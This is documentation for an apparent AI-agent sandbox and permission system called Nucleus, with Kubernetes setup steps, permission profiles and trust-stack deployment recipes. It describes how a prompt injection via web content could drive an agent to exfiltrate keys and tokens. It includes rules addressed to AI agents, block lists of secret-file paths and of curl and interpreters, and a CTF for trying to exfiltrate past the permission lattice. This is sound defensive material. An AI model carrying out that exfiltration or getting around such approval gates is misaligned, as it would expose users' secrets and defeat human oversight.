│                                         │
│  This agent has:                        │
│  ✓ Read access to files                 │
│  ✓ Web access (prompt injection risk)   │
│  ✓ Git push capability                  │
│                                         │
│  Approve this operation? [y/N]          │
└─────────────────────────────────────────┘

Comparison with Agent Sandbox

Security Model

Google Agent Sandbox uses gVisor, which intercepts syscalls in userspace:

App → Sentry (Go) → Host Kernel
         ↓
    Filters ~300 syscalls

Nucleus uses Firecracker with full hardware virtualization:

App → Guest Kernel → Firecracker VMM → KVM → Host Kernel
                          ↓
                   ~50K lines Rust
                   Minimal device model

When to Choose Nucleus

Choose Nucleus when you need:

Hardware isolation: Defense against kernel exploits
Permission governance: Fine-grained capability control beyond RBAC
Compliance: SOC2, HIPAA, NIST frameworks requiring VM-level isolation
Prompt injection defense: Automatic uninhabitable state detection

Choose Agent Sandbox when you need:

Faster iteration: Lighter weight for development
GKE integration: Native warm pools and pod snapshots
Higher density: More sandboxes per node

Roadmap: Native CRDs

We’re working on native Kubernetes CRDs to match Agent Sandbox ergonomics:

# Coming soon
apiVersion: nucleus.io/v1
kind: NucleusSandbox
metadata:
  name: my-agent
spec:
  profile: fix-issue
  workDir: /workspace
  image: python:3.12-slim

  # Lattice-guard permissions
  permissions:
    capabilities:
      read_files: always
      run_bash: low_risk
    paths:
      allowed: ["/workspace/**"]
      blocked: ["**/.env", "**/*.pem"]
    budget:
      max_cost_usd: 5.00
---
apiVersion: nucleus.io/v1
kind: NucleusSandboxClaim
metadata:
  name: agent-session
spec:
  templateRef: my-agent
  ttl: 1h

Track progress: GitHub Issues

Agent Sandbox Integration

Run AI agent sandboxes on Kubernetes using Agent Sandbox with Firecracker isolation via Kata Containers.

Overview

Agent Sandbox is a CNCF/Kubernetes SIG Apps project that provides Kubernetes-native primitives for running AI agents in isolated environments. It supports pluggable runtimes via the standard runtimeClassName field.

This guide covers two paths:

Path	Runtime	KVM Required	Use Case
Local (gVisor)	`runsc`	No	Validate workflow on macOS/Windows
Cloud (kata-fc)	Firecracker	Yes	Production with hardware VM isolation

Comparison: Agent Sandbox vs Nucleus

Feature	Agent Sandbox + gVisor	Agent Sandbox + kata-fc	Nucleus
Isolation	Syscall filter	Firecracker VM	Firecracker VM
Memory overhead	~50MB	~130MB	~5MB
Startup time	<1s	~1-2s	<125ms
Permission model	Pod RBAC only	Pod RBAC only	Lattice-guard
Uninhabitable state detection	No	No	Yes
Budget enforcement	No	No	Yes

Use Agent Sandbox + kata-fc when you need:

Standard Kubernetes CRD workflow
Firecracker isolation without custom controllers
Compatibility with existing k8s tooling (Argo CD, Flux)

Use Nucleus directly when you need:

Fine-grained permission policies (portcullis)
Automatic uninhabitable state detection (prompt injection defense)
Lower memory footprint and faster startup

Local Testing: gVisor on kind (Intel Mac / No KVM)

This path validates the Agent Sandbox workflow without requiring KVM. Useful for development on Intel Macs or any system without nested virtualization.

Prerequisites

Docker Desktop running
kubectl configured
kind installed (brew install kind)

Step 1: Download gVisor Binaries

# Create directory for gVisor binaries
mkdir -p /tmp/gvisor

# Download runsc (gVisor runtime)
curl -sL https://storage.googleapis.com/gvisor/releases/release/latest/x86_64/runsc \
  -o /tmp/gvisor/runsc
chmod +x /tmp/gvisor/runsc

# Download containerd shim
curl -sL https://storage.googleapis.com/gvisor/releases/release/latest/x86_64/containerd-shim-runsc-v1 \
  -o /tmp/gvisor/containerd-shim-runsc-v1
chmod +x /tmp/gvisor/containerd-shim-runsc-v1

Step 2: Create kind Cluster

# Create kind config
cat > /tmp/kind-gvisor.yaml << 'EOF'
kind: Cluster
apiVersion: kind.x-k8s.io/v1alpha4
nodes:
- role: control-plane
  extraMounts:
  - hostPath: /tmp/gvisor
    containerPath: /opt/gvisor
EOF

# Create cluster
kind create cluster --name agent-sandbox-test --config /tmp/kind-gvisor.yaml

Step 3: Install gVisor in kind Node

# Copy binaries into the kind node
docker cp /tmp/gvisor/runsc agent-sandbox-test-control-plane:/usr/local/bin/runsc
docker cp /tmp/gvisor/containerd-shim-runsc-v1 agent-sandbox-test-control-plane:/usr/local/bin/containerd-shim-runsc-v1

# Configure containerd to use gVisor
docker exec agent-sandbox-test-control-plane bash -c '
cat >> /etc/containerd/config.toml << EOF

[plugins."io.containerd.grpc.v1.cri".containerd.runtimes.runsc]
  runtime_type = "io.containerd.runsc.v1"
EOF
'

# Restart containerd
docker exec agent-sandbox-test-control-plane systemctl restart containerd

# Create RuntimeClass
kubectl apply -f - << 'EOF'
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc
EOF

Step 4: Install Agent Sandbox

# Install Agent Sandbox CRDs and controller
kubectl apply -f https://github.com/kubernetes-sigs/agent-sandbox/releases/download/v0.1.0/manifest.yaml

# Wait for controller to be ready
kubectl wait --for=condition=Ready pod -l app=agent-sandbox-controller \
  -n agent-sandbox-system --timeout=120s

Step 5: Create Test Sandbox

kubectl apply -f - << 'EOF'
apiVersion: agents.x-k8s.io/v1alpha1
kind: Sandbox
metadata:
  name: gvisor-test
spec:
  podTemplate:
    spec:
      runtimeClassName: gvisor
      containers:
      - name: agent
        image: busybox:latest
        command: ["sleep", "infinity"]
EOF

# Watch for Ready status
kubectl wait --for=condition=Ready sandbox/gvisor-test --timeout=60s

Step 6: Verify gVisor Isolation

# Confirm runtimeClassName
kubectl get pod gvisor-test -o jsonpath='{.spec.runtimeClassName}'
# Output: gvisor

# Verify gVisor kernel (look for "Starting gVisor...")
kubectl exec gvisor-test -- dmesg | head -5
# Output:
# [   0.000000] Starting gVisor...
# [   0.533579] Gathering forks...
# ...

Cleanup

kubectl delete sandbox gvisor-test
kind delete cluster --name agent-sandbox-test

Cloud Testing: Firecracker on KVM Cluster

This path provides hardware VM isolation using Firecracker via Kata Containers.

Prerequisites

Kubernetes cluster with KVM-enabled nodes (bare metal or nested virt)
- GKE: Use n2-standard-* with nested virtualization enabled
- EKS: Use metal instances (m5.metal, c5.metal)
- On-prem: Nodes with /dev/kvm accessible
kubectl configured
Helm 3.x installed

Step 1: Label KVM-Capable Nodes

# Identify nodes with KVM support
for node in $(kubectl get nodes -o name); do
  if kubectl debug $node -it --image=busybox -- test -c /dev/kvm 2>/dev/null; then
    echo "$node has KVM"
    kubectl label $node katacontainers.io/kata-runtime=true --overwrite
  fi
done

Step 2: Install Kata Containers with Firecracker

# Add Kata Containers Helm repo
helm repo add kata-containers https://kata-containers.github.io/kata-containers
helm repo update

# Install Kata with Firecracker hypervisor
helm install kata-fc kata-containers/kata-deploy \
  --namespace kata-system --create-namespace \
  --set hypervisor=fc \
  --set runtimeClasses[0].name=kata-fc \
  --set runtimeClasses[0].handler=kata-fc

# Wait for DaemonSet rollout
kubectl rollout status daemonset/kata-deploy -n kata-system --timeout=300s

# Verify RuntimeClass exists
kubectl get runtimeclass kata-fc

Step 3: Install Agent Sandbox

# Install Agent Sandbox CRDs and controller
kubectl apply -f https://github.com/kubernetes-sigs/agent-sandbox/releases/download/v0.1.0/manifest.yaml

# Wait for controller
kubectl wait --for=condition=Ready pod -l app=agent-sandbox-controller \
  -n agent-sandbox-system --timeout=120s

Step 4: Create Firecracker-Isolated Sandbox

kubectl apply -f - << 'EOF'
apiVersion: agents.x-k8s.io/v1alpha1
kind: Sandbox
metadata:
  name: firecracker-test
spec:
  podTemplate:
    spec:
      runtimeClassName: kata-fc
      containers:
      - name: agent
        image: python:3.12-slim
        command: ["sleep", "infinity"]
        resources:
          requests:
            memory: "256Mi"
            cpu: "100m"
          limits:
            memory: "512Mi"
            cpu: "500m"
EOF

# Wait for Ready
kubectl wait --for=condition=Ready sandbox/firecracker-test --timeout=120s

Step 5: Verify Firecracker Isolation

# Confirm kata-fc runtime
kubectl get pod firecracker-test -o jsonpath='{.spec.runtimeClassName}'
# Output: kata-fc

# Check for VM indicators in /proc/cpuinfo
kubectl exec firecracker-test -- cat /proc/cpuinfo | grep -E "(model name|hypervisor)"
# Should show hypervisor or QEMU-style CPU

# Verify Firecracker process on host (from node)
NODE=$(kubectl get pod firecracker-test -o jsonpath='{.spec.nodeName}')
kubectl debug node/$NODE -it --image=busybox -- ps aux | grep firecracker

Agent Sandbox CRD Reference

Sandbox

The core resource for creating isolated agent environments.

apiVersion: agents.x-k8s.io/v1alpha1
kind: Sandbox
metadata:
  name: my-agent
spec:
  # Standard PodSpec template
  podTemplate:
    spec:
      runtimeClassName: kata-fc  # or gvisor
      containers:
      - name: agent
        image: my-agent:latest
        command: ["python", "agent.py"]
        env:
        - name: OPENAI_API_KEY
          valueFrom:
            secretKeyRef:
              name: agent-secrets
              key: openai-key
        resources:
          requests:
            memory: "512Mi"
            cpu: "250m"
          limits:
            memory: "2Gi"
            cpu: "2"

  # Persistent storage (survives restarts)
  volumeClaimTemplates:
  - metadata:
      name: workspace
    spec:
      accessModes: ["ReadWriteOnce"]
      resources:
        requests:
          storage: 10Gi

  # Lifecycle management
  shutdownPolicy: Delete  # or Retain

SandboxTemplate (Extensions)

Reusable templates for common agent configurations.

# Install extensions
kubectl apply -f https://github.com/kubernetes-sigs/agent-sandbox/releases/download/v0.1.0/extensions.yaml

apiVersion: agents.x-k8s.io/v1alpha1
kind: SandboxTemplate
metadata:
  name: python-agent
spec:
  podTemplate:
    spec:
      runtimeClassName: kata-fc
      containers:
      - name: agent
        image: python:3.12-slim
        resources:
          requests:
            memory: "512Mi"
          limits:
            memory: "2Gi"

SandboxClaim

Request a sandbox from a template.

apiVersion: agents.x-k8s.io/v1alpha1
kind: SandboxClaim
metadata:
  name: my-session
spec:
  templateRef:
    name: python-agent
  ttl: 1h

Troubleshooting

Pod stuck in ContainerCreating

gVisor: Check for missing shim binary.

kubectl describe pod <pod-name> | grep -A5 Events
# Look for: "containerd-shim-runsc-v1": file does not exist

Fix: Ensure both runsc and containerd-shim-runsc-v1 are in /usr/local/bin/.

kata-fc: Check for KVM access.

kubectl debug node/<node> -it --image=busybox -- ls -la /dev/kvm
# Should show: crw-rw---- 1 root kvm 10, 232 ...

Sandbox stuck in Pending

Check if the controller is running:

kubectl get pods -n agent-sandbox-system
kubectl logs -n agent-sandbox-system -l app=agent-sandbox-controller

RuntimeClass not found

Verify the RuntimeClass exists:

kubectl get runtimeclass

For gVisor, create manually:

kubectl apply -f - << 'EOF'
apiVersion: node.k8s.io/v1
kind: RuntimeClass
metadata:
  name: gvisor
handler: runsc
EOF

Next Steps

Kubernetes Quickstart - Deploy Nucleus directly on Kubernetes
Permission Model - Understanding portcullis policies
Threat Model - Security analysis

References

Nucleus Permissions Guide

TL;DR for AI Assistants

You have a permission profile. Check it before acting.

- "Never" = blocked, don't try
- "LowRisk" = allowed for safe operations
- "Always" = always allowed

If you have read_files + web access + git push all enabled,
exfiltration actions (git push, create PR, bash) require human approval.
This is the "uninhabitable state protection" - it prevents prompt injection attacks
from stealing secrets.

The Problem: Uninhabitable State

When an AI agent has all three of these capabilities at autonomous levels:

Capability	Example	Risk
Private data access	Reading files, credentials	Sees secrets
Untrusted content	Web search, fetching URLs	Prompt injection vector
External communication	Git push, create PR, bash	Exfiltration channel

…a single prompt injection can exfiltrate your SSH keys, API tokens, or source code.

Nucleus automatically detects this combination and requires human approval for exfiltration actions.

Permission Levels

Each tool capability has one of three levels:

Never     →  Blocked entirely
    ↓
LowRisk   →  Auto-approved for safe operations
    ↓
Always    →  Always auto-approved

Example

capabilities:
  read_files: always      # Can always read files
  write_files: low_risk   # Can write to safe locations
  run_bash: never         # Cannot run shell commands
  web_fetch: low_risk     # Can fetch approved URLs
  git_push: low_risk      # Can push (but may need approval)

Built-in Profiles

`filesystem-readonly`

Read-only with sensitive paths blocked.

read_files: always    web_search: never     git_push: never
write_files: never    web_fetch: never      create_pr: never
edit_files: never     git_commit: never     run_bash: never

`read-only`

Safe for exploration. No writes, no network, no git.

read_files: always    web_search: never     git_push: never
write_files: never    web_fetch: never      create_pr: never
edit_files: never     git_commit: never

`network-only`

Web-only access, no filesystem or execution.

read_files: never     web_search: low_risk  git_push: never
write_files: never    web_fetch: low_risk   create_pr: never
edit_files: never     git_commit: never     run_bash: never

`web-research`

Read + web search/fetch, no writes or exec.

read_files: low_risk  web_search: low_risk  git_push: never
write_files: never    web_fetch: low_risk   create_pr: never
edit_files: never     git_commit: never     run_bash: never

`code-review`

Read code, search web for context, but no modifications.

read_files: always    web_search: low_risk  git_push: never
write_files: never    web_fetch: never      create_pr: never
edit_files: never     git_commit: never

`edit-only`

Write + edit without shell or web.

read_files: always    web_search: never     git_push: never
write_files: low_risk web_fetch: never      create_pr: never
edit_files: low_risk  git_commit: never     run_bash: never

`local-dev`

Local development workflow without web access.

read_files: always    web_search: never     git_push: never
write_files: low_risk web_fetch: never      create_pr: never
edit_files: low_risk  git_commit: low_risk  run_bash: low_risk

`fix-issue`

Full development workflow with uninhabitable state protection.

read_files: always    web_search: low_risk  git_push: low_risk*
write_files: low_risk web_fetch: low_risk   create_pr: low_risk*
edit_files: low_risk  git_commit: low_risk
run_bash: low_risk

* Requires approval due to uninhabitable state detection

`release`

Release/publish workflow with approvals on exfiltration.

read_files: always    web_search: low_risk  git_push: low_risk*
write_files: low_risk web_fetch: low_risk   create_pr: low_risk*
edit_files: low_risk  git_commit: low_risk  run_bash: low_risk

* Requires approval

`database-client`

Database CLI access only (psql/mysql/redis).

read_files: never     web_search: never     git_push: never
write_files: never    web_fetch: never      create_pr: never
edit_files: never     git_commit: never     run_bash: low_risk

`demo`

For live demos - blocks shell interpreters.

read_files: always    web_search: low_risk  git_push: low_risk
write_files: low_risk web_fetch: low_risk   create_pr: low_risk
edit_files: low_risk  git_commit: low_risk
run_bash: low_risk    (blocked: python, node, bash, etc.)

Workflow Profiles (Orchestrated Agents)

These profiles are designed for multi-agent workflows where different agents have specialized roles. They’re optimized for security through architectural constraints.

`pr-review` (alias: `pr_review`)

For automated PR review agents. Read-only + web access, no exfiltration.

read_files: always    web_search: low_risk  git_push: never
write_files: never    web_fetch: low_risk   create_pr: never
edit_files: never     git_commit: never     run_bash: never

** Uninhabitable state status**: NOT vulnerable (no exfiltration capability)

Use case: Review PRs, post comments via GitHub API, analyze diffs. Note: run_bash is disabled because it’s an exfil vector when combined with web access.

`codegen`

For isolated code generation agents. Full dev capabilities, NO network access.

read_files: always    web_search: never     git_push: never
write_files: low_risk web_fetch: never      create_pr: never
edit_files: low_risk  git_commit: low_risk  run_bash: low_risk

** Uninhabitable state status**: NOT vulnerable (no untrusted content exposure)

Use case: Implement features in a Firecracker microVM, run tests, commit locally. Network isolation prevents prompt injection attacks from web content.

`pr-approve` (alias: `pr_approve`)

For automated PR approval agents. Can merge PRs after CI verification.

read_files: always    web_search: low_risk  git_push: low_risk*
write_files: never    web_fetch: low_risk   create_pr: never
edit_files: never     git_commit: never     run_bash: low_risk*

* Requires approval (uninhabitable state-gated)

** Uninhabitable state status**: VULNERABLE → git_push and run_bash require approval

Use case: Verify CI status via GitHub API, then merge approved PRs. The uninhabitable state protection means git_push is gated on human/CI approval.

Uninhabitable state Detection

When nucleus detects the uninhabitable state, it automatically adds approval obligations to exfiltration vectors:

Your permissions:
  read_files: always     ← Private data access ✓
  web_fetch: low_risk    ← Untrusted content ✓
  git_push: low_risk     ← Exfiltration vector ✓

 Uninhabitable state detected! Adding approval requirement:
  git_push: requires approval
  create_pr: requires approval
  run_bash: requires approval

This happens automatically. You don’t configure it. You can’t disable it (even via malicious JSON payloads - the constraint is enforced on deserialization).

For AI Assistants: How to Check Permissions

Before Taking Action

# Pseudocode for AI tool execution
if action.type == "git_push":
    if permissions.requires_approval("git_push"):
        return "I need approval to push. Shall I proceed?"
    else:
        execute(action)

Understanding Your Profile

When you receive a permission profile, check:

What level is each capability?
- never = don’t attempt
- low_risk = safe operations okay
- always = go ahead
Is uninhabitable state active?
- If read_files >= low_risk AND web_* >= low_risk AND git_push >= low_risk
- Then git_push, create_pr, run_bash need approval
Check path restrictions
- allowed_paths: only these directories
- blocked_paths: never touch these (e.g., **/.env, **/*.pem)
Check budget
- max_cost_usd: spending limit
- max_tokens: token limits
Check time
- valid_until: when permissions expire

Path Restrictions

paths:
  allowed:
    - "/workspace/**"           # Only workspace
    - "/home/user/project/**"   # Or specific project
  blocked:
    - "**/.env"                 # No .env files
    - "**/.env.*"               # No .env.local, etc.
    - "**/secrets.*"            # No secrets files
    - "**/*.pem"                # No private keys
    - "**/*.key"                # No key files

Command Restrictions

commands:
  blocked:
    - program: "bash"           # No bash
      args: ["*"]
    - program: "python"         # No python interpreter
      args: ["*"]
    - program: "curl"           # No curl to arbitrary URLs
      args: ["*"]
  allowed:
    - program: "git"            # Git is okay
      args: ["status", "*"]
    - program: "cargo"          # Cargo is okay
      args: ["build", "*"]

Budget Limits

budget:
  max_cost_usd: 5.00           # $5 spending cap
  max_input_tokens: 100000     # 100k input tokens
  max_output_tokens: 10000     # 10k output tokens

Time Limits

time:
  valid_from: "2024-01-01T00:00:00Z"
  valid_until: "2024-01-01T01:00:00Z"  # 1 hour session

Delegation (Sub-agents)

When delegating to a sub-agent, permissions can only go down, never up:

Parent: read_files=always, write_files=low_risk
Child request: write_files=always

Result: write_files=low_risk (capped at parent level)

This is enforced mathematically via lattice meet operation.

Quick Reference Card

┌─────────────────────────────────────────────────────────────┐
│                    PERMISSION LEVELS                        │
├─────────────────────────────────────────────────────────────┤
│  never     Blocked. Don't attempt.                          │
│  low_risk  Allowed for safe operations.                     │
│  always    Always allowed.                                  │
├─────────────────────────────────────────────────────────────┤
│                    uninhabitable state RULE                            │
├─────────────────────────────────────────────────────────────┤
│  IF   read_files ≥ low_risk                                 │
│  AND  (web_fetch OR web_search) ≥ low_risk                  │
│  AND  (git_push OR create_pr OR run_bash) ≥ low_risk        │
│  THEN exfiltration actions require approval                 │
├─────────────────────────────────────────────────────────────┤
│                    BUILT-IN PROFILES                        │
├─────────────────────────────────────────────────────────────┤
│  filesystem-readonly  Read + search; blocks sensitive paths │
│  read-only            Explore only, no writes               │
│  network-only         Web-only access                       │
│  web-research         Read + web search/fetch               │
│  code-review          Read + web search, no modifications   │
│  edit-only            Write/edit, no exec or web            │
│  local-dev            Write + shell, no web                 │
│  fix-issue            Full dev workflow, uninhabitable state protected │
│  release              Push/PR with approvals                │
│  database-client      DB CLI only                           │
│  demo                 For demos, blocks interpreters        │
│  permissive           Everything allowed (trusted only)     │
│  restrictive          Minimal permissions                   │
├─────────────────────────────────────────────────────────────┤
│                   WORKFLOW PROFILES                         │
├─────────────────────────────────────────────────────────────┤
│  pr-review            Read + web, NO exfil (safe)           │
│  codegen              Write + bash, NO network (isolated)   │
│  pr-approve           Read + web + push (CI-gated approval) │
└─────────────────────────────────────────────────────────────┘

Integration Endpoints

The surfaces nucleus exposes for integration — agent discovery (A2A), verification, keyless identity, transparency log, and MCP. Status is honest: some are live today, some are offline/in-browser (no server needed), and some are deploy-ready services you self-host.

status	meaning
🟢 LIVE	hosted and reachable right now
🔵 OFFLINE	runs client-side / in CI — no endpoint to call
🟡 SELF-HOST	the service is built + deploy-ready (`fly.toml`), but not currently on a public URL — `fly deploy` to expose it

Agent discovery (A2A)

A JWS-signed Agent Card describing the agent’s identity, capabilities, and verification keys (nucleus-agent-card).

GET /.well-known/agent-card.json — 🟡 SELF-HOST (published by nucleus-verifier-service)

The card is signed; verify it against the issuer’s jwks.json before trusting it.

Verification

Re-check a signed provenance bundle / receipt (nucleus-verifier-service).

POST /v1/verify — verify a bundle inline — 🟡 SELF-HOST
POST /v1/bundles/{hash}/verify — verify by content hash — 🟡 SELF-HOST
GET /.well-known/jwks.json — issuer verify key — 🟡 SELF-HOST

You usually don’t need the server: the offline verifier is live and needs no endpoint.

npm i @coproduct_inc/verify → verifyReceipt(...) — 🔵 OFFLINE (zero-trust, recomputes the verdict)
In-browser WASM demo: https://coproduct-opensource.github.io/nucleus/verify/ — 🟢 LIVE

Transparency log & witness federation

Tamper-evident inclusion + a cosigning witness ring (nucleus-verifier-service).

GET /v1/log/size · GET /v1/log/sth — 🟡 SELF-HOST
GET /v1/log/inclusion-proof · GET /v1/log/consistency-proof — 🟡 SELF-HOST
GET /v1/witness/peers · POST /v1/witness/peer-sth — 🟡 SELF-HOST

Keyless identity (OIDC → SPIFFE)

Federated, keyless identity — exchange a workload OIDC token, publish a verify set (nucleus-oidc-provider).

GET /.well-known/openid-configuration — RFC 8414 discovery — 🟡 SELF-HOST
GET /jwks.json — RFC 7517 verify set — 🟡 SELF-HOST
POST /oauth/token — RFC 8693 token exchange — 🟡 SELF-HOST

DID / WebFinger

Resolve a SPIFFE identity to a DID document + permission-fingerprint binding (nucleus-identity).

GET /.well-known/webfinger?resource=spiffe://<trust-domain>/... → links to /.well-known/did.json + /.well-known/spiffe-did-binding.json — 🟡 SELF-HOST

MCP (agent-native)

Model Context Protocol endpoints so an LLM/agent can call nucleus directly.

The Vault CTF MCP: https://nucleus-ctf.fly.dev/mcp — 🟢 LIVE
Verifier MCP: /mcp on nucleus-verifier-service — 🟡 SELF-HOST
nucleus-mcp-server (stdio MCP tool) — 🔵 OFFLINE

The Vault (try it / point an agent at it) — 🟢 LIVE

A formally-verified permission lattice you (or an LLM) try to exfiltrate past.

Play: https://nucleus-ctf.fly.dev/ (also published at /nucleus/vault/ on these docs)
GET /api/v1/levels · GET /api/v1/levels/{level}
POST /api/v1/attack · POST /api/v1/challenge
GET /openapi.json · GET /api (docs)

Honest deployment status (2026-06)

Live today: The Vault (nucleus-ctf.fly.dev), the offline npm verifier (@coproduct_inc/verify), and the in-browser /verify WASM demo. The nucleus-verifier-service and nucleus-oidc-provider are built and deploy-ready (fly.toml in each crate) but are not currently on a public URL — fly deploy to expose them, or wire your own host. The agent card is served by the verifier-service, so it goes live when that service is deployed.

For self-hosting recipes see the existing guides in docs/ (verifier integration, external-RP integration, OpenClaw users).

Split-Trust: Run Your Own Quorum Across Failure Domains

One-line thesis. With nucleus you can make it so that no single machine, region, cloud account, or key store you operate can forge or roll back your own agent log — and you can do this alone, with zero counterparties. The “mesh” buys you failure-domain diversity, not other organizations. Network effects are additive, never a prerequisite.

This guide consolidates the shipped nucleus trust stack into a single deployment story for the single-tenant operator. Everything below uses real commands and flags from merged crates; nothing here is aspirational unless it is explicitly marked as a future seam.

1. The thesis: single-tenant value first

Most “trust networks” sell you on a future where other parties watch your log. That is a real benefit — but it is a chicken-and-egg trap: the network is worthless until enough strangers join, so the tool is worthless on day one.

Nucleus inverts this. The trust stack is useful to one operator with no counterparties at all, because the thing you are defending against is not “a malicious peer org” — it is your own infrastructure failing or being compromised in a correlated way:

a region goes dark or its disks are silently rolled back to a snapshot,
one cloud account’s credentials leak,
one key store (KMS/HSM) is breached or its operator is coerced,
one machine is rooted and starts rewriting history.

If a single failure domain can rewrite or roll back your agent’s execution lineage, your provenance is only as trustworthy as your weakest box. The fix is the same one used by HashiCorp Vault Seal HA (pick seals “unlikely to become unavailable at the same time” — KMS keys in two cloud regions or two providers), by Sigstore witnesses (multiple independent co-signers defeat the log’s “split-view” attack), and by MPC/threshold signing (distribute signing authority so “security is distributed across multiple, independent parties… in different geographic or administrative domains”):

Spread the trust across failure domains you control, and require a quorum of them to agree before anything counts.

This is the classic “come for the tool, stay for the network” shape, but honest about the order: the tool stands on its own first (cdixon, 2015). A single nucleus node already gives you tamper-evident, signed lineage you can verify offline. Adding your own k-of-n witnesses across regions makes that lineage un-rollback-able without a threshold compromise — still with zero external parties. Federating with other organizations later is strictly additive value on top.

2. Deployment recipe

The pieces, and which shipped crate each one is:

Capability	Crate / tool	What it buys the solo operator
k-of-n checkpoint co-signing	`nucleus-witness` (binary)	No single region/cloud/key can roll back your log
Quorum policy	`nucleus-lineage::policy` (Sigsum grammar)	Declarative `k-of-n` over your witnesses
Bundle replication	`nucleus-bundle-cas` via `nucleus bundle`	Bao-verified provenance copies across your machines
Federate your own domains	`nucleus-oidc-core::spiffe_federation`	`prod`/`staging`/`edge`/`ci` trust each other, no central CA
Auditable enrollment	`nucleus-trust-registry` (binary)	PR-rooted, transparency-logged record of which domains federate
Client-side verification	`nucleus-verifier-wasm` (`@coproduct/nucleus-verifier-wasm`)	Verify in-browser/Node, trusting no server

2.1 Run k-of-n witnesses across diverse failure domains

A nucleus witness is a C2SP tlog-witness server: it mints an Ed25519 cosignature over a transparency-log checkpoint, but only if the checkpoint is signed by a trusted log key, strictly extends the last checkpoint it co-signed (an RFC 6962 consistency proof), and is not a rollback. The whole security value is in that status matrix — a witness refuses to co-sign a forked or rolled-back log.

Run one witness per failure domain: different regions, different cloud accounts, ideally different cloud providers, with each witness key in a different key store. The invocation (from crates/nucleus-witness/src/main.rs):

# Witness A — e.g. AWS us-east-1, key from that account's KMS.
# Seed comes from the environment (a secret manager), NOT a flag, in prod.
export NUCLEUS_WITNESS_SEED_HEX="<32-byte ed25519 seed, hex>"

nucleus-witness \
  --bind 0.0.0.0:8443 \
  --witness-name "nucleus.witness/aws-use1" \
  --origin "myagent.log.example/prod|myagent-log|<log-pubkey-hex>"

Flags (all real, from the Cli struct):

--bind — listen address. Default 0.0.0.0:8443; bind to all interfaces for 6PN / k8s reachability.
--witness-seed-hex / NUCLEUS_WITNESS_SEED_HEX — hex 32-byte Ed25519 seed. Load it from a secret manager / HSM / KMS, never a CLI flag in production (the help text says so; a missing seed falls back to a loud-warning dev seed that must not ship).
--witness-name — the C2SP key_name that appears in cosignature lines. Default nucleus.witness/local. Give each witness a distinct, region-tagged name.
--origin — repeatable; format origin|log_key_name|log_pubkey_hex. This is the log (and its public key) the witness will co-sign for. With no --origin, every checkpoint returns 404 until origins are added.

On startup each witness logs its own pubkey_hex — record those, they go straight into your quorum policy below.

State persistence caveat. The shipped store (store::InMemoryStore) is in-memory behind the OriginStore trait and is not persistent: a restart resets each origin to “never seen”, which would let a producer replay an old checkpoint as a first submission. Production MUST back the store with durable storage (litewitness uses sqlite); the trait boundary makes that a drop-in without touching the status matrix.

2.2 Write a Sigsum k-of-n quorum policy

A verifier enforces how many of your witnesses must agree. Nucleus parses the sigsum-go policy grammar in nucleus-lineage::policy. Example 2-of-3 across three failure domains (paste the pubkey_hex each witness logged at startup):

# A Sigsum-style policy: 2 of my 3 own witnesses must co-sign.
# `log` is recorded for grammar completeness (future submission routing),
# not used by the quorum evaluator.
log     <log-pubkey-hex>

witness aws-use1   <witness-A-pubkey-hex>   https://witness-a.example:8443
witness gcp-euw1   <witness-B-pubkey-hex>   https://witness-b.example:8443
witness fly-iad    <witness-C-pubkey-hex>   https://witness-c.example:8443

group   my-quorum  2  aws-use1 gcp-euw1 fly-iad
quorum  my-quorum

Grammar (exactly as implemented in policy.rs):

witness <name> <pubkey-hex> [url] — a named witness, 32-byte Ed25519 key (hex).
group <name> all|any|<k> <member>... — all = every member, any = ≥ 1, <k> = ≥ k distinct members. Members may be witness names or other group names — groups nest, so you can express “(any 1 of the EU pair) AND (any 1 of the US pair)”.
quorum <name> — exactly one, naming the top-level group/witness that satisfies the whole policy.

Security properties the parser/evaluator enforce (these are the load-bearing parts, with negative tests):

A witness that co-signs twice counts once — is_satisfied works over the set of distinct witnesses whose cosignatures already verified.
A decimal threshold larger than the member count is rejected at parse time (ThresholdExceedsMembers) — an unsatisfiable policy can never silently “fail open”.
The evaluator does not itself verify Ed25519 signatures — you must only feed it the names of witnesses whose cosignatures you already cryptographically checked (e.g. via nucleus-lineage::cosign). The trust boundary is explicit and one-directional.

2.3 Replicate provenance bundles across your machines

nucleus-bundle-cas addresses a serialized provenance Bundle by the BLAKE3 hash of its JSON bytes and moves it over iroh-blobs as a bao-verified stream. For the solo operator this is content-addressed, self-validating disaster-recovery replication of your own bundles across your own regions/clouds: any replica’s bytes self-validate against the hash, so a corrupted or substituted copy is rejected on fetch.

Publish (serves the bytes until Ctrl-C) — from nucleus bundle (crates/nucleus-cli/src/bundle.rs):

nucleus bundle publish ./my-session-bundle.json
# prints:
#   blake3-hash: <64 hex>
#   node-ticket: <iroh BlobTicket>

Fetch on another machine, then verify provenance separately:

nucleus bundle fetch \
  "<node-ticket>" \
  "<blake3-hash>" \
  --trust-anchor ./trust-anchor.jwks.json \
  --json

Positional + flag arguments (exactly as in FetchArgs):

<node_ticket> — the iroh ticket printed by publish; carries the peer’s address out-of-band (there is no DHT/discovery — see §3).
<blake3_hash> — 64 hex chars; the bao stream is rooted at this hash, so a peer cannot substitute other content. (The fetcher also cross-checks the ticket’s embedded hash against this and refuses on mismatch.)
--trust-anchor <path> — required out-of-band JWKS. Byte-integrity is not provenance (see §3); this is the anchor verify_bundle runs against. The bundle’s embedded JWKS is deliberately ignored.
--json, --show-payload — output controls.

nucleus-bundle-cas is a native (tokio + QUIC) transport — it is server/CLI-side only and is NOT wired into the WASM/browser verifier.

2.4 Federate your own trust domains (no central CA)

Run each environment — prod, staging, edge, ci — as its own SPIFFE trust domain with its own authority, then let them accept each other’s workload identities with no central CA. nucleus-oidc-core::spiffe_federation is the inbound side: it consumes a foreign domain’s trust bundle and validates inbound JWT-SVIDs minted by that domain.

The binding trust-domain → (bundle-endpoint URL, profile) is operator- supplied and out-of-band (a [[federates_with]] config row), because the SPIFFE Federation spec states this binding “cannot be securely inferred”:

# prod accepts CI's workloads. None of these fields is ever derived from a
# token or from each other.
[[federates_with]]
trust_domain        = "ci.example.org"
bundle_endpoint_url = "https://ci.example.org/spiffe-bundle"
profile             = "https_web"   # the only profile implemented

What this module does and does not do (honest scope, from the module docs):

Inbound only — it consumes foreign bundles and verifies foreign JWT-SVIDs; it does not mint or serve your own bundle.
https_web profile only — bundles are fetched over ordinary Web-PKI TLS (RFC 6125 server-cert validation). There is no https_spiffe profile, no x509-svid path, and no SPIFFE Workload API client.
